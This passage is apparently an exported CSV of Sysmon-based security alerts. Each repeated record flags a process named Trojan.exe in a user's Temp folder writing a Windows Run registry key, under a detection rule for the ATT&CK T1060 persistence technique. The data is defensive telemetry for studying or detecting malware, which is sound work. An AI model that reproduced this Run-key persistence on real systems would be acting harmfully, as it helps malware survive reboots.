HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:21:28.976"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:41.068",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:27.960 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:27.963474200Z"",""eventRecordID"":""1051"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:27.960\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:27.960"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:40.068",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:26.929 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:26.932861800Z"",""eventRecordID"":""1050"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:26.929\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:26.929"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:18:39.037",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:25.914 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:25.922226100Z"",""eventRecordID"":""1049"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:25.914\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:21:25.914"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:38.049",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:24.882 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:24.887911800Z"",""eventRecordID"":""1048"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:24.882\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:24.882"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:36.991",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:23.867 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:23.868431500Z"",""eventRecordID"":""1047"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:23.867\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:23.867"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:18:35.958",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:22.851 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:22.857439000Z"",""eventRecordID"":""1046"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:22.851\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:21:22.851"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:34.959",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:21.835 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:21.841374600Z"",""eventRecordID"":""1045"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:21.835\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:21.835"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:33.943",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:20.820 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:20.823405400Z"",""eventRecordID"":""1044"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:20.820\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:20.820"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:18:32.927",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:19.791 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:19.793780600Z"",""eventRecordID"":""1043"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:19.791\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:21:19.791"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:31.912",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:18.757 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:18.758692400Z"",""eventRecordID"":""1042"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:18.757\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:18.757"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:30.865",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:17.741 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:17.757687900Z"",""eventRecordID"":""1041"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:17.741\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 